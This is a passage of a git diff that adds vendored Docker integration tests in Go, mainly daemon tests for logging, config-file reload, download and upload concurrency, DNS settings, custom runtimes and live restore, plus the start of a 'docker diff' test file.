+	out, err = s.d.Cmd("run", "-d", "--name=test", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = s.d.Cmd("start", "-a", "test2")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received")
+
+	err = s.d.Restart()
+	c.Assert(err, check.IsNil)
+	out, err = s.d.Cmd("start", "-a", "test2")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received")
+}
+
+func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotPpc64le)
+
+	infoLog := "\x1b[34mINFO\x1b"
+
+	p, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil)
+	defer func() {
+		tty.Close()
+		p.Close()
+	}()
+
+	b := bytes.NewBuffer(nil)
+	go io.Copy(b, p)
+
+	// Enable coloring explicitly
+	s.d.StartWithLogFile(tty, "--raw-logs=false")
+	s.d.Stop()
+	c.Assert(b.String(), checker.Contains, infoLog)
+
+	b.Reset()
+
+	// Disable coloring explicitly
+	s.d.StartWithLogFile(tty, "--raw-logs=true")
+	s.d.Stop()
+	c.Assert(b.String(), check.Not(checker.Contains), infoLog)
+}
+
+func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotPpc64le)
+
+	debugLog := "\x1b[37mDEBU\x1b"
+
+	p, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil)
+	defer func() {
+		tty.Close()
+		p.Close()
+	}()
+
+	b := bytes.NewBuffer(nil)
+	go io.Copy(b, p)
+
+	s.d.StartWithLogFile(tty, "--debug")
+	s.d.Stop()
+	c.Assert(b.String(), checker.Contains, debugLog)
+}
+
+func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	// daemon config file
+	daemonConfig := `{ "debug" : false }`
+	configFile, err := ioutil.TempFile("", "test-daemon-discovery-backend-config-reload-config")
+	c.Assert(err, checker.IsNil, check.Commentf("could not create temp file for config reload"))
+	configFilePath := configFile.Name()
+	defer func() {
+		configFile.Close()
+		os.RemoveAll(configFile.Name())
+	}()
+
+	_, err = configFile.Write([]byte(daemonConfig))
+	c.Assert(err, checker.IsNil)
+
+	// --log-level needs to be set so that d.Start() doesn't add --debug causing
+	// a conflict with the config
+	err = s.d.Start("--config-file", configFilePath, "--log-level=info")
+	c.Assert(err, checker.IsNil)
+
+	// daemon config file
+	daemonConfig = `{
+	      "cluster-store": "consul://consuladdr:consulport/some/path",
+	      "cluster-advertise": "192.168.56.100:0",
+	      "debug" : false
+	}`
+
+	err = configFile.Truncate(0)
+	c.Assert(err, checker.IsNil)
+	_, err = configFile.Seek(0, os.SEEK_SET)
+	c.Assert(err, checker.IsNil)
+
+	_, err = configFile.Write([]byte(daemonConfig))
+	c.Assert(err, checker.IsNil)
+
+	err = s.d.reloadConfig()
+	c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config"))
+
+	out, err := s.d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: consul://consuladdr:consulport/some/path"))
+	c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: 192.168.56.100:0"))
+}
+
+// Test for #21956
+func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) {
+	err := s.d.StartWithBusybox("--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514")
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--log-driver=json-file", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	out, err = s.d.Cmd("inspect", "--format='{{.HostConfig.LogConfig}}'", id)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "{json-file map[]}")
+}
+
+// Test case for #20936, #22443
+func (s *DockerDaemonSuite) TestDaemonMaxConcurrency(c *check.C) {
+	c.Assert(s.d.Start("--max-concurrent-uploads=6", "--max-concurrent-downloads=8"), check.IsNil)
+
+	expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 6"`
+	expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"`
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
+}
+
+// Test case for #20936, #22443
+func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	// daemon config file
+	configFilePath := "test.json"
+	configFile, err := os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(configFilePath)
+
+	daemonConfig := `{ "max-concurrent-downloads" : 8 }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+
+	expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"`
+	expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"`
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
+
+	configFile, err = os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	daemonConfig = `{ "max-concurrent-uploads" : 7, "max-concurrent-downloads" : 9 }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+
+	time.Sleep(3 * time.Second)
+
+	expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 7"`
+	expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 9"`
+	content, _ = ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
+}
+
+// Test case for #20936, #22443
+func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	// daemon config file
+	configFilePath := "test.json"
+	configFile, err := os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(configFilePath)
+
+	daemonConfig := `{ "max-concurrent-uploads" : null }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+
+	expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"`
+	expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 3"`
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
+
+	configFile, err = os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	daemonConfig = `{ "max-concurrent-uploads" : 1, "max-concurrent-downloads" : null }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+
+	time.Sleep(3 * time.Second)
+
+	expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 1"`
+	expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"`
+	content, _ = ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
+
+	configFile, err = os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	daemonConfig = `{ "labels":["foo=bar"] }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+
+	time.Sleep(3 * time.Second)
+
+	expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 5"`
+	expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"`
+	content, _ = ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
+	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
+}
+
+func (s *DockerDaemonSuite) TestBuildOnDisabledBridgeNetworkDaemon(c *check.C) {
+	err := s.d.StartWithBusybox("-b=none", "--iptables=false")
+	c.Assert(err, check.IsNil)
+	s.d.c.Logf("dockerBinary %s", dockerBinary)
+	out, code, err := s.d.buildImageWithOut("busyboxs",
+		`FROM busybox
+                RUN cat /etc/hosts`, false)
+	comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", out, code, err)
+	c.Assert(err, check.IsNil, comment)
+	c.Assert(code, check.Equals, 0, comment)
+}
+
+// Test case for #21976
+func (s *DockerDaemonSuite) TestDaemonDNSInHostMode(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	err := s.d.StartWithBusybox("--dns", "1.2.3.4")
+	c.Assert(err, checker.IsNil)
+
+	expectedOutput := "nameserver 1.2.3.4"
+	out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+}
+
+// Test case for #21976
+func (s *DockerDaemonSuite) TestDaemonDNSSearchInHostMode(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	err := s.d.StartWithBusybox("--dns-search", "example.com")
+	c.Assert(err, checker.IsNil)
+
+	expectedOutput := "search example.com"
+	out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+}
+
+// Test case for #21976
+func (s *DockerDaemonSuite) TestDaemonDNSOptionsInHostMode(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	err := s.d.StartWithBusybox("--dns-opt", "timeout:3")
+	c.Assert(err, checker.IsNil)
+
+	expectedOutput := "options timeout:3"
+	out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+}
+
+func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) {
+	conf, err := ioutil.TempFile("", "config-file-")
+	c.Assert(err, check.IsNil)
+	configName := conf.Name()
+	conf.Close()
+	defer os.Remove(configName)
+
+	config := `
+{
+    "runtimes": {
+        "oci": {
+            "path": "docker-runc"
+        },
+        "vm": {
+            "path": "/usr/local/bin/vm-manager",
+            "runtimeArgs": [
+                "--debug"
+            ]
+        }
+    }
+}
+`
+	ioutil.WriteFile(configName, []byte(config), 0644)
+	err = s.d.StartWithBusybox("--config-file", configName)
+	c.Assert(err, check.IsNil)
+
+	// Run with default runtime
+	out, err := s.d.Cmd("run", "--rm", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with default runtime explicitly
+	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with oci (same path as default) but keep it around
+	out, err = s.d.Cmd("run", "--name", "oci-runtime-ls", "--runtime=oci", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with "vm"
+	out, err = s.d.Cmd("run", "--rm", "--runtime=vm", "busybox", "ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory")
+
+	// Reset config to only have the default
+	config = `
+{
+    "runtimes": {
+    }
+}
+`
+	ioutil.WriteFile(configName, []byte(config), 0644)
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	// Give daemon time to reload config
+	<-time.After(1 * time.Second)
+
+	// Run with default runtime
+	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with "oci"
+	out, err = s.d.Cmd("run", "--rm", "--runtime=oci", "busybox", "ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Unknown runtime specified oci")
+
+	// Start previously created container with oci
+	out, err = s.d.Cmd("start", "oci-runtime-ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Unknown runtime specified oci")
+
+	// Check that we can't override the default runtime
+	config = `
+{
+    "runtimes": {
+        "runc": {
+            "path": "my-runc"
+        }
+    }
+}
+`
+	ioutil.WriteFile(configName, []byte(config), 0644)
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	// Give daemon time to reload config
+	<-time.After(1 * time.Second)
+
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, `file configuration validation failed (runtime name 'runc' is reserved)`)
+
+	// Check that we can select a default runtime
+	config = `
+{
+    "default-runtime": "vm",
+    "runtimes": {
+        "oci": {
+            "path": "docker-runc"
+        },
+        "vm": {
+            "path": "/usr/local/bin/vm-manager",
+            "runtimeArgs": [
+                "--debug"
+            ]
+        }
+    }
+}
+`
+	ioutil.WriteFile(configName, []byte(config), 0644)
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	// Give daemon time to reload config
+	<-time.After(1 * time.Second)
+
+	out, err = s.d.Cmd("run", "--rm", "busybox", "ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory")
+
+	// Run with default runtime explicitly
+	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) {
+	err := s.d.StartWithBusybox("--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager")
+	c.Assert(err, check.IsNil)
+
+	// Run with default runtime
+	out, err := s.d.Cmd("run", "--rm", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with default runtime explicitly
+	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with oci (same path as default) but keep it around
+	out, err = s.d.Cmd("run", "--name", "oci-runtime-ls", "--runtime=oci", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with "vm"
+	out, err = s.d.Cmd("run", "--rm", "--runtime=vm", "busybox", "ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory")
+
+	// Start a daemon without any extra runtimes
+	s.d.Stop()
+	err = s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	// Run with default runtime
+	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Run with "oci"
+	out, err = s.d.Cmd("run", "--rm", "--runtime=oci", "busybox", "ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Unknown runtime specified oci")
+
+	// Start previously created container with oci
+	out, err = s.d.Cmd("start", "oci-runtime-ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Unknown runtime specified oci")
+
+	// Check that we can't override the default runtime
+	s.d.Stop()
+	err = s.d.Start("--add-runtime", "runc=my-runc")
+	c.Assert(err, check.NotNil)
+
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, `runtime name 'runc' is reserved`)
+
+	// Check that we can select a default runtime
+	s.d.Stop()
+	err = s.d.StartWithBusybox("--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager")
+	c.Assert(err, check.IsNil)
+
+	out, err = s.d.Cmd("run", "--rm", "busybox", "ls")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory")
+
+	// Run with default runtime explicitly
+	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	// top1 will exist after daemon restarts
+	out, err := s.d.Cmd("run", "-d", "--name", "top1", "busybox:latest", "top")
+	c.Assert(err, checker.IsNil, check.Commentf("run top1: %v", out))
+	// top2 will be removed after daemon restarts
+	out, err = s.d.Cmd("run", "-d", "--rm", "--name", "top2", "busybox:latest", "top")
+	c.Assert(err, checker.IsNil, check.Commentf("run top2: %v", out))
+
+	out, err = s.d.Cmd("ps")
+	c.Assert(out, checker.Contains, "top1", check.Commentf("top1 should be running"))
+	c.Assert(out, checker.Contains, "top2", check.Commentf("top2 should be running"))
+
+	// now restart daemon gracefully
+	err = s.d.Restart()
+	c.Assert(err, checker.IsNil)
+
+	out, err = s.d.Cmd("ps", "-a")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	c.Assert(out, checker.Contains, "top1", check.Commentf("top1 should exist after daemon restarts"))
+	c.Assert(out, checker.Not(checker.Contains), "top2", check.Commentf("top2 should be removed after daemon restarts"))
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	containerName := "error-values"
+	// Make a container with both a non 0 exit code and an error message
+	out, err := s.d.Cmd("run", "--name", containerName, "busybox", "toto")
+	c.Assert(err, checker.NotNil)
+
+	// Check that those values were saved on disk
+	out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName)
+	out = strings.TrimSpace(out)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Equals, "127")
+
+	out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName)
+	out = strings.TrimSpace(out)
+	c.Assert(err, checker.IsNil)
+
+	// now restart daemon
+	err = s.d.Restart()
+	c.Assert(err, checker.IsNil)
+
+	// Check that those values are still around
+	out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName)
+	out = strings.TrimSpace(out)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Equals, "127")
+
+	out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName)
+	out = strings.TrimSpace(out)
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerDaemonSuite) TestDaemonBackcompatPre17Volumes(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	d := s.d
+	err := d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	// hack to be able to side-load a container config
+	out, err := d.Cmd("create", "busybox:latest")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	out, err = d.Cmd("inspect", "--type=image", "--format={{.ID}}", "busybox:latest")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(d.Stop(), checker.IsNil)
+	<-d.wait
+
+	imageID := strings.TrimSpace(out)
+	volumeID := stringid.GenerateNonCryptoID()
+	vfsPath := filepath.Join(d.root, "vfs", "dir", volumeID)
+	c.Assert(os.MkdirAll(vfsPath, 0755), checker.IsNil)
+
+	config := []byte(`
+		{
+			"ID": "` + id + `",
+			"Name": "hello",
+			"Driver": "` + d.storageDriver + `",
+			"Image": "` + imageID + `",
+			"Config": {"Image": "busybox:latest"},
+			"NetworkSettings": {},
+			"Volumes": {
+				"/bar":"/foo",
+				"/foo": "` + vfsPath + `",
+				"/quux":"/quux"
+			},
+			"VolumesRW": {
+				"/bar": true,
+				"/foo": true,
+				"/quux": false
+			}
+		}
+	`)
+
+	configPath := filepath.Join(d.root, "containers", id, "config.v2.json")
+	err = ioutil.WriteFile(configPath, config, 600)
+	err = d.Start()
+	c.Assert(err, checker.IsNil)
+
+	out, err = d.Cmd("inspect", "--type=container", "--format={{ json .Mounts }}", id)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	type mount struct {
+		Name        string
+		Source      string
+		Destination string
+		Driver      string
+		RW          bool
+	}
+
+	ls := []mount{}
+	err = json.NewDecoder(strings.NewReader(out)).Decode(&ls)
+	c.Assert(err, checker.IsNil)
+
+	expected := []mount{
+		{Source: "/foo", Destination: "/bar", RW: true},
+		{Name: volumeID, Destination: "/foo", RW: true},
+		{Source: "/quux", Destination: "/quux", RW: false},
+	}
+	c.Assert(ls, checker.HasLen, len(expected))
+
+	for _, m := range ls {
+		var matched bool
+		for _, x := range expected {
+			if m.Source == x.Source && m.Destination == x.Destination && m.RW == x.RW || m.Name != x.Name {
+				matched = true
+				break
+			}
+		}
+		c.Assert(matched, checker.True, check.Commentf("did find match for %+v", m))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	dockerProxyPath, err := exec.LookPath("docker-proxy")
+	c.Assert(err, checker.IsNil)
+	tmpDir, err := ioutil.TempDir("", "test-docker-proxy")
+	c.Assert(err, checker.IsNil)
+
+	newProxyPath := filepath.Join(tmpDir, "docker-proxy")
+	cmd := exec.Command("cp", dockerProxyPath, newProxyPath)
+	c.Assert(cmd.Run(), checker.IsNil)
+
+	// custom one
+	c.Assert(s.d.StartWithBusybox("--userland-proxy-path", newProxyPath), checker.IsNil)
+	out, err := s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// try with the original one
+	c.Assert(s.d.Restart("--userland-proxy-path", dockerProxyPath), checker.IsNil)
+	out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// not exist
+	c.Assert(s.d.Restart("--userland-proxy-path", "/does/not/exist"), checker.IsNil)
+	out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "driver failed programming external connectivity on endpoint")
+	c.Assert(out, checker.Contains, "/does/not/exist: no such file or directory")
+}
+
+// Test case for #22471
+func (s *DockerDaemonSuite) TestDaemonShutdownTimeout(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	c.Assert(s.d.StartWithBusybox("--shutdown-timeout=3"), check.IsNil)
+
+	_, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGINT)
+
+	select {
+	case <-s.d.wait:
+	case <-time.After(5 * time.Second):
+	}
+
+	expectedMessage := `level=debug msg="start clean shutdown of all containers with a 3 seconds timeout..."`
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMessage)
+}
+
+// Test case for #22471
+func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	// daemon config file
+	configFilePath := "test.json"
+	configFile, err := os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(configFilePath)
+
+	daemonConfig := `{ "shutdown-timeout" : 8 }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+
+	configFile, err = os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	daemonConfig = `{ "shutdown-timeout" : 5 }`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+
+	select {
+	case <-s.d.wait:
+	case <-time.After(3 * time.Second):
+	}
+
+	expectedMessage := `level=debug msg="Reset Shutdown Timeout: 5"`
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	c.Assert(string(content), checker.Contains, expectedMessage)
+}
+
+// Test case for 29342
+func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	s.d.StartWithBusybox("--live-restore")
+
+	out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+
+	s.d.waitRun("top")
+
+	out1, err := s.d.Cmd("exec", "-u", "test", "top", "id")
+	// uid=100(test) gid=101(test) groups=101(test)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out1))
+
+	// restart daemon.
+	s.d.Restart("--live-restore")
+
+	out2, err := s.d.Cmd("exec", "-u", "test", "top", "id")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out2))
+	c.Assert(out1, check.Equals, out2, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2))
+
+	out, err = s.d.Cmd("stop", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+}
+
+func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) {
+	testRequires(c, DaemonIsLinux, overlayFSSupported, SameHostDaemon)
+	s.d.StartWithBusybox("--live-restore", "--storage-driver", "overlay")
+	out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+
+	s.d.waitRun("top")
+
+	// restart daemon.
+	s.d.Restart("--live-restore", "--storage-driver", "overlay")
+
+	out, err = s.d.Cmd("stop", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+
+	// test if the rootfs mountpoint still exist
+	mountpoint, err := s.d.inspectFilter("top", ".GraphDriver.Data.MergedDir")
+	c.Assert(err, check.IsNil)
+	f, err := os.Open("/proc/self/mountinfo")
+	c.Assert(err, check.IsNil)
+	defer f.Close()
+	sc := bufio.NewScanner(f)
+	for sc.Scan() {
+		line := sc.Text()
+		if strings.Contains(line, mountpoint) {
+			c.Fatalf("mountinfo should not include the mountpoint of stop container")
+		}
+	}
+
+	out, err = s.d.Cmd("rm", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go
new file mode 100644
index 0000000000..08cf6e1caa
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go
@@ -0,0 +1,98 @@
+package main
+
+import (
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// ensure that an added file shows up in docker diff
+func (s *DockerSuite) TestDiffFilenameShownInOutput(c *check.C) {
+	containerCmd := `mkdir /foo; echo xyzzy > /foo/bar`
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd)
+
+	// Wait for it to exit as cannot diff a running container on Windows, and
+	// it will take a few seconds to exit. Also there's no way in Windows to
+	// differentiate between an Add or a Modify, and all files are under
+	// a "Files/" prefix.
+	containerID := strings.TrimSpace(out)
+	lookingFor := "A /foo/bar"
+	if daemonPlatform == "windows" {
+		err := waitExited(containerID, 60*time.Second)
+		c.Assert(err, check.IsNil)
+		lookingFor = "C Files/foo/bar"
+	}
+
+	cleanCID := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "diff", cleanCID)
+
+	found := false
+	for _, line := range strings.Split(out, "\n") {
+		if strings.Contains(line, lookingFor) {
+			found = true
+			break
+		}
+	}
+	c.Assert(found, checker.True)
+}
+
+// test to ensure GH #3840 doesn't occur any more
+func (s *DockerSuite) TestDiffEnsureInitLayerFilesAreIgnored(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// this is a list of files which shouldn't show up in `docker diff`
+	initLayerFiles := []string{"/etc/resolv.conf", "/etc/hostname", "/etc/hosts", "/.dockerenv"}
+	containerCount := 5
+
+	// we might not run into this problem from the first run, so start a few containers
+	for i := 0; i < containerCount; i++ {
+		containerCmd := `echo foo > /root/bar`
+		out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd)
+
+		cleanCID := strings.TrimSpace(out)
+		out, _ = dockerCmd(c, "diff", cleanCID)
+
+		for _, filename := range initLayerFiles {
+			c.Assert(out, checker.Not(checker.Contains), filename)
+		}
+	}
+}
+
+func (s *DockerSuite) TestDiffEnsureDefaultDevs(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "0")
+
+	cleanCID := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "diff", cleanCID)
+
+	expected := map[string]bool{
+		"C /dev":         true,
+		"A /dev/full":    true, // busybox
+		"C /dev/ptmx":    true, // libcontainer
